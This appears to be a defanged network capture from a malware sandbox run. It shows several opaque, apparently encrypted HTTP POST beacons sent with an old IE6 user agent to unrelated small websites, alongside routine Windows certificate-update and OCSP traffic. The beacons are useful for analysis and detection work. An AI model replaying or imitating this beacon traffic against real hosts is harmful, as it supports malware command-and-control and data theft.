charset="UTF-8" />.<meta http-equiv="Content-Type" content="tex
t/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" con
tent="IE=Edge,chrome=1" />.<meta name="robots" content="noindex,
nofollow" />.<meta name="viewport" content="width=device-width,
initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="c
f_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" med
ia="screen,projection" />.<!--[if lt IE 9]><link rel="styl
esheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
type="text/css" media="screen,projection" /><![endif]-->.<
style type="text/css">body{margin:0;padding:0}</style>.<!-
-[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scri
pts/jquery.min.js"></script><![endif]-->.<!--[if gte
IE 10]><!--><script type="text/javascript" src="/cdn-cgi/
scripts/zepto.min.js"></script><!--<![endif]-->.<
script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 512
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: perc.ca
Connection: Keep-Alive
Cache-Control: no-cache

2140yChFx3rF7lF662YDn5syd6owr Mg3DImHf/mcsCcV8Wtqe4XCgQb 4SGvCST4t/9lR2cOxi1x1 B/FtI3zSACRNx3IoKSeQ0ugw7Yp/R0XNnFyHXahIiGOJr4QusTQTuP1P/5MaznsKjkiMeBzi41NUd38rHGl8gRzpqvK5WBjtzBVRzmZjSJMpMwV0o3 EyVhERKAv35yqDCh7YZszuMNh51/oTMuLcD0frSG9p6jRDNpg77Sf3Cvdu7SxrU0EdDbv4ybEVROjA3he8dz9FTm2sdGClbab4BMtUPjXMH9dbdqn1FDW2XK4l881JAsVQZ6KN51XQE/VuUVPE4U2rFX2SDa36vIrwA6QWpGVM02KnvXfA Y9vKU aPfwSv4jTnn4H8QV5mTksXe8Ce4Rber5mM9r8OQ1GneOnmwPi ekoNiUfW/cgvO nqFZBmcjQL l6uR4hz5qDfVV7aopKlHk8qc/qKAg5jFYgGu/hB86jr6E/FEsq94g/15I=
HTTP/1.1 301 Moved Permanently
Server: nginx/1.12.0
Date: Sat, 01 Jul 2017 11:17:12 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Connection: keep-alive
Location: hXXp://VVV.perc.ca/
Cache-Control: max-age=3600
Expires: Sat, 01 Jul 2017 12:17:12 GMT
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.perc.ca/">here</a>.&
lt;/p>.<hr>.<address>Apache Server at perc.ca Port 80&l
t;/address>.</body></html>.HTTP/1.1 301 Moved Permanent
ly..Server: nginx/1.12.0..Date: Sat, 01 Jul 2017 11:17:12 GMT..Content
-Type: text/html; charset=iso-8859-1..Content-Length: 284..Connection:
keep-alive..Location: hXXp://VVV.perc.ca/..Cache-Control: max-age=360
0..Expires: Sat, 01 Jul 2017 12:17:12 GMT..Vary: Accept-Encoding..<
!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><h
ead>.<title>301 Moved Permanently</title>.</head>
<body>.<h1>Moved Permanently</h1>.<p>The docum
ent has moved <a href="hXXp://VVV.perc.ca/">here</a>.</
p>.<hr>.<address>Apache Server at perc.ca Port 80</a
ddress>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 452
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: asterisk.com.sg
Connection: Keep-Alive
Cache-Control: no-cache

c4atri6fjGIC0Ll0OVx90JHEadOuAPuBQlr/OhkMMlxV01d1ffcOzmfAED0YnaHQk56FN20qwW5EF5wnhLVc63cg3hAYTLNx7 S3WaLTmX9nT7FqZciDhtk5lUK5W6py4o/A pbD57wBUbFxB1Lp6LMdzns0f8PgBOfUCxZNFIs1wJBgNDComxJbOGThKHS4vGCB1R8PE9MvFc3lCIstEj/Ih03ptJfgdCROMPRONSM1NPocEAoE7DlRxRgIdw2ftphIZyYRpuvpV/hbxChHMogdYslgcfo11Z/KaDhZqYyvzLKg75MKXDYnSXcvnAlAfPqfUhKJR5QV1hZF2d/WZNALmj5Il0R5JuefGt3NR5AXq/IvJ1wYhrfCoq9sJrJiB5/vX4SJTM0Clxjm9x7nuejg/wD g3wkcMVlL8UD8EH3RRxQKL6xXBnfLt2gN9u/itw=
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:44 GMT
Content-Length: 6745
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>.. <head>.. <title>Asterisk Compute
r (FE) Pte Ltd</title>.. <meta http-equiv="Content-Typ
e" content="text/html; charset=UTF-8">.. <link rel=StyleS
heet href="default.css" type="text/css" media="screen">.. &l
t;link rel="icon" type="image/ico" href="images/favicon.ico"/>..
</head>.. <body>.. <!-- Header -->..
<div id="header">.. <div class="logo"><a href="in
dex.php"><img src="images/asterisk_logo.jpg" border="0" /><
;/a></div>.. <div class="country"><img src="image
s/singapore_malaysia.jpg" border="0"></div>..</div>..&l
t;p>.... <!-- Menu -->.. <div id="navigation
">.. <div class="menu"><a href="about_us.php"&g
t;<img src="images/about_us.jpg" border="0"></a></div&g
t;.. <div class="menu"><a href="customers.php">
<img src="images/customers.jpg" border="0"></a></div>
;.. <div class="menu"><a href="products_and_servic
es.php"><img src="images/products_and_services.jpg" border="0"&g
t;</a></div>.. <div class="menu"><a hr
ef="business_solutions.php"><img src="images/business_solutions.
jpg" border="0"></a></div>.. <div class="
menu"><a href="resources.php"><img src="images/resourc

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 464
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: meridies.org
Connection: Keep-Alive
Cache-Control: no-cache

ZPkMXn0AeXrmKAJqNMf6trZltvOrSeRqAcEI2ftkbDsJv7vqi /ofXPUnz7FKPyzwpdVLWAOnACjnFn7wYq7MtB64oZ3cEJH8ryDThIKER9uCTwdbWUvdy/mkmOpD/gv2QqAzaHptJ7VXOGuR3XPTvfoqFdpwuZNDap/ERu6sV6Wjyz5QXYGBixCCKsNwi0 KFxiXL2Fbp6Ckl4iYej1TVeIId6tzt9r2EdCfW36gH3imaBHbar42s0QHa5f Fm/Z4QpYOSmYWlMiiLYkVuF5zWS/hRhhobdScSg3RXKHFQmbr5E/VZr Y JLbPdAJkq lGzqEWvrj2 /RviSfyGOaRiVyqgj3OGrIaaXdWRYNx6h8QKUROLzzqVjZ5/Gwo/czsV0J6GGePzLdWTNc0V880PXdlOu7NNuwc6l3AzYDzZf/C32fYSm8GPDzEnZmq/x/hHhY1Cemi6Qlo=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:10 GMT
Server: Apache
Last-Modified: Tue, 14 Apr 2015 02:06:43 GMT
Accept-Ranges: bytes
Content-Length: 611
Vary: Accept-Encoding
Cache-Control: max-age=3600, must-revalidate
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html
<HEAD>.<META HTTP-EQUIV="Refresh" CONTENT="6;URL=hXXp://lmgtf
y.com/?q=kingdom of meridies">.<TITLE>Please note the change
of address!</TITLE>.</HEAD>.<BODY bgcolor="#819FF7">
.<CENTER>.<H2>We have moved! The new web address for this
page is</H2>.<H2><A HREF="hXXp://lmgtfy.com/?q=kingdom
of meridies">.hXXp://lmgtfy.com/?q=kingdom of meridies </H2>.
</A>.<H2>"...Please wait a moment to be transferred to the
new site..."</H2>.<BLOCKQUOTE>.<B>.If you have wait
ed more than a few seconds and you are still seeing this message, plea
se click on the link above! Thank you..</B>.</BLOCKQUOTE>.
</CENTER>.</BODY>.</HTML>HTTP/1.1 200 OK..Date: Sat,
01 Jul 2017 11:17:10 GMT..Server: Apache..Last-Modified: Tue, 14 Apr
2015 02:06:43 GMT..Accept-Ranges: bytes..Content-Length: 611..Vary: Ac
cept-Encoding..Cache-Control: max-age=3600, must-revalidate..Keep-Aliv
e: timeout=5, max=150..Connection: Keep-Alive..Content-Type: text/html
..<HEAD>.<META HTTP-EQUIV="Refresh" CONTENT="6;URL=hXXp://lmg
tfy.com/?q=kingdom of meridies">.<TITLE>Please note the chang
e of address!</TITLE>.</HEAD>.<BODY bgcolor="#819FF7"&g
t;.<CENTER>.<H2>We have moved! The new web address for thi
s page is</H2>.<H2><A HREF="hXXp://lmgtfy.com/?q=kingdo
m of meridies">.hXXp://lmgtfy.com/?q=kingdom of meridies </H2>
;.</A>.<H2>"...Please wait a moment to be transferred

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: totalearthcare.com.au
Connection: Keep-Alive
Cache-Control: no-cache

IDvvTMaB92jNRPkd4W4L2 n p7ImU2PwWtrZwY nr6IqApQbV7hxg/fik7m6Q Lkmrxecic85Z9mEZlH4vJvaD nuCY/CFoAeNGVCk9ksaSN8ZAy 09dsX1p yX98yQsPLqRsrC6zeiufqhIORHn EyjlfIKAIvxDi9RTrKvbr0vRa5MYYxJx4/SLlqlSVM1XGpNfxKQ3403oznwk6P62Zoqr7sQMHxMXnfa4cMC00oFGPYO39iRBPMXlZxXtqgITHFfUa3L 7Zur2rBYJrIT4KCRmsEWm/XATMy7U0gzD1zp2c6MvDOaWzN8sNfFI7TfkhJECV jLvetEOcd33Ob/LnFmfbhAl9qSPmLCaKiPYx/k08dsAwu1BvfNuPuHOQKBkPTmj0HA9ezzQqiy1u8G4IlsRj49 6L7x3EWFW0Qu/Cd8vvVzrJW/9YA/Y5dGvAwbxxYOFP5LKlmonunB3vGQIJUCW93gDi0/w14XQ53 tdE4uZFuZ w76K0M=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d8d248c3fe60cae30e3092d476a1b9c5d1498907811; expires=Sun, 01-Jul-18 11:16:51 GMT; path=/; domain=.totalearthcare.com.au; HttpOnly
Last-Modified: Mon, 29 Jul 2013 04:19:18 GMT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 3778f49af360841e-KBP
261..<html>.<head>..<meta charset="utf-8">..<titl
e>Total Earth Care</title>.</head>.<body style="back
ground:#d5d8b2;">.<header>. <div style="width:600px; marg
in:50px auto; text-align:center;">.. .<img style="margin:0px au
to"src="hXXp://VVV.totalearthcare.com.au/wp-content/uploads/2013/05/to
tal-earth-care-logo1.gif"/>. </div>.</header>.<sect
ion>. <div style="width:600px; margin:0px auto; text-align:ce
nter;">. <a style="text-decoration:none;padding:10px 15px; c
olor:#fff; background:#809856;font-family: Arial, sans-serif;" href="/
home">click here to enter site</a>. </div>.</secti
on>.</body>.</html>..0..HTTP/1.1 200 OK..Date: Sat, 01
Jul 2017 11:16:51 GMT..Content-Type: text/html..Transfer-Encoding: chu
nked..Connection: keep-alive..Set-Cookie: __cfduid=d8d248c3fe60cae30e3
092d476a1b9c5d1498907811; expires=Sun, 01-Jul-18 11:16:51 GMT; path=/;
domain=.totalearthcare.com.au; HttpOnly..Last-Modified: Mon, 29 Jul 2
013 04:19:18 GMT..Accept-Ranges: bytes..Server: cloudflare-nginx..CF-R
AY: 3778f49af360841e-KBP..261..<html>.<head>..<meta cha
rset="utf-8">..<title>Total Earth Care</title>.</hea
d>.<body style="background:#d5d8b2;">.<header>. <di
v style="width:600px; margin:50px auto; text-align:center;">.. .&l
t;img style="margin:0px auto"src="hXXp://VVV.totalearthcare.com.au/wp-
content/uploads/2013/05/total-earth-care-logo1.gif"/>. </di

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: buzzkillmedia.com
Connection: Keep-Alive
Cache-Control: no-cache

UdWoBYxqDGgcYWvR9yQw35/NbFBkGhzzgKRSFqGL/YuKsklKgLhkmZfNJI7dhdwMSV4MuuNRRLVOv4caqs9Ogft9nCqJt1kqGXlBY9G2k0dIN7TBAAuC qAd6bdQmf swI/ifwgtv5rFsrarGzaesic1ilNEukZ1yZ7ozS5digp4IZzuknDpRclz3ngqnX9O2TLK0JBEnLhiDLP6Ac2geqDjGz9p2vpyNhYraVJKlVTKs0QYyi5qOqHhv7owWx7G6U8pS6XG Ja38yOWPyqK x8V7lSK8mqftv20vbMjAkp4C6j5 AexDxo52dPmeJd7y/csMKNpCsuf3QTcYaty67Pi4sH6epNtlHW3O/YBc0wH9TW8iJAz7xqrNjuCtGiBcIlXNmXa Bd0nuctxXmT4ve0ds3HJYpGTdpapYZpgAvW4HltADyqcJdvd4c3f0I/Y22Ot8ClS zaksjjrQ==
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 01 Jul 2017 11:16:15 GMT
Location: hXXps://VVV.hugedomains.com/domain_profile.cfm?d=buzzkillmedia&e=com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 189
Connection: keep-alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXps://VVV.
hugedomains.com/domain_profile.cfm?d=buzzkillmedia&e=com">here&
lt;/a>.</h2>..</body></html>..HTTP/1.1 302 Found.
.Cache-Control: private..Content-Type: text/html; charset=utf-8..Date:
Sat, 01 Jul 2017 11:16:15 GMT..Location: hXXps://VVV.hugedomains.com/
domain_profile.cfm?d=buzzkillmedia&e=com..Server: Microsoft-IIS/8.5..X
-Powered-By: ASP.NET..Content-Length: 189..Connection: keep-alive..<
;html><head><title>Object moved</title></head&
gt;<body>..<h2>Object moved to <a href="hXXps://VVV.hug
edomains.com/domain_profile.cfm?d=buzzkillmedia&e=com">here<
/a>.</h2>..</body></html>....


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Cache-Control: max-age = 547348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 19 Nov 2013 21:12:41 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1664
content-transfer-encoding: binary
Cache-Control: max-age=514484, public, no-transform, must-revalidate
Last-Modified: Fri, 30 Jun 2017 10:08:09 GMT
Expires: Fri, 7 Jul 2017 10:08:09 GMT
Date: Sat, 01 Jul 2017 11:17:30 GMT
Connection: keep-alive
0..|......u0..q.. .....0.....b0..^0.............V.m......E!....2017063
0100809Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
....^.3@..cL.1.......20170630100809Z....20170707100809Z0...*.H........
......X4.......W.".ZZ.......vq.v.. ....3.n/...|@..%.G....#j.x.S).J....
.....|Y..%%.F...HB..v.......vR...S ...ZYF.../n......e..t......}1..G..^
... ..^$...e].u.,..........)w..P."6...p.y.......'H..>E.*G.[/.......
.:.....G[h...........|...4..mH....7...c....E.m..f....g....0...0...0...
...............[Df..{.,0...*.H........0..1.0...U....US1.0...U....VeriS
ign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at h
ttps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Sign
ing 2009-2 CA0...161213000000Z..211231235959Z0F1D0B..U...;Symantec Cla
ss 3 Code Signing 2009-2 CA SHA1 OCSP Responder0.."0...*.H............
.0.............2q..J..:...3....X.?.....9K.G....,......e.c,..9YI...z.qA
0....9...CG......6.qX>.Xo.....g..=..B.E.......qB..W.|..>.qT.4Z|
....H. m...m..qy]Gi...0N.T.....N,.U.WJ5.f...r..@..8.b.......=..G.0....
.y4N"mK.J...."..".......ju.....k...x........P.]S=t....*..'............
.0...0...U.......0.0f..U. ._0]0[..`.H...E....0L0#.. .........hXXps://d
.symcb.com/cps0%.. .......0...hXXps://d.symcb.com/rpa0...U.%..0... ...
....0...U...........0... .....0......0"..U....0...0.1.0...U....TGV-OFF
-640...U.............V.m......E!..0...U.#..0.....k.&p..?...-.5.....0..
.*.H.............C.....S>F ..u.=KA5..@...`........a0s.M......JH.X.Y
..E........CX../......f5j..a......k...:.r/.J5..G...h...~.".A.]...2

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT
If-None-Match: "8017f9a85f10d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT
Accept-Ranges: bytes
ETag: "80f83df077e4d21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 52967
Date: Sat, 01 Jul 2017 11:16:45 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
MSCF............,...................I..................J.` .authroot.s
tl.^R.Y.6..CK...8...........].y.Q..!Jv..%k.....!..DH...B.KBWE.(.f.RQ*.
..f...}'.....x.:.{f...|.s.q..CF.......0....{%i......P.F.yNz:A..L..1..3
...........IG.....4=....~."|..s.|.xuT..._.*.....e.h,....ozs..*.!TmS..A
q... |,.....V..xV....^....FE(.x...N..h...b....y...j.!....7..h. ..@.(V.
.....8..`-..#=.jq'.e...|..X...@...{..rj.d.....?n3.L.......S.......:.O.
.."k.!o......`.l.B 1.....#].....k6.........B.......!P$.A..<..?zk...
.~..P)A0tu....x..-X..E..,a.7,xN..eed.3..L..XT......IG.w_.Y....E....~k.
.X...T.V.g7d.....#.&~.f.O....Dh...x0..J...0..u.dF..P.!..d...%x<!...
....@,...0..3..-.....q.....X.e....A...z.'..2.<.m.f...I.9.z..a.6vo..
...P..U7...-.0.Q..<zd!V....=.'.....2H;..5.7.%5PsD.#.....ht%......f
..s.Dp..Lklx%[.!c...I.<...f.<..e.k`......^.......X..?Z...?......
?..I}..5V.v .q.c.9j..Y..J..0U.t./%..Jd @.W.u......U.".)C(........T.4.y
..J.57*^HlY....O|..~\.J]..]e...?..x2c..6.....i.=?x.....N..-X..f"^@'...
.-v..v...7j.Y1.5._v.....*S9.."........%E<E...;p.}........0..P....g.
.@.]E.3........K....K.4V..Q.-,.../.........:.A....Ng,.........BFef.[..
. ..."*...^...L._#:,7..6:.z..!a............E.r>......A....#..c.....
rS.......7.D..JdR.`6.|...>.0....Wf..n..^..8x.4..........-.3y,3.C.(.
...9f...iNK....q....sUq....c...c.....*K.8"..D...<..0............*x,
$x....a....]..p..t.M....6F..u.....p.r.kf...Z......h~.B3...[.....Hc...K
.....I.....%F..:.....N....U..eU........ e. k....3(S..h....1..r..Z.Y...
.....A.i..Z....[%J.....=2"v].....L.P..!........PC*.........j 8.~.)

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86399
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 13 Jun 2017 19:04:53 GMT
If-None-Match: "80f83df077e4d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/vnd.ms-cab-compressed
Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT
ETag: "80f83df077e4d21:0"
Cache-Control: max-age=604800
Date: Sat, 01 Jul 2017 11:16:49 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
HTTP/1.1 304 Not Modified..Content-Type: application/vnd.ms-cab-compre
ssed..Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT..ETag: "80f83df077e
4d21:0"..Cache-Control: max-age=604800..Date: Sat, 01 Jul 2017 11:16:4
9 GMT..Connection: keep-alive..X-CCC: UA..X-CID: 2..
....



GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:16:58 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:03 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:09 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:14 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z.
....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT
Accept-Ranges: bytes
ETag: "80b4b9e9dc5d01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Length: 1213
Date: Sat, 01 Jul 2017 11:17:19 GMT
Connection: keep-alive
X-CCC: UA
X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
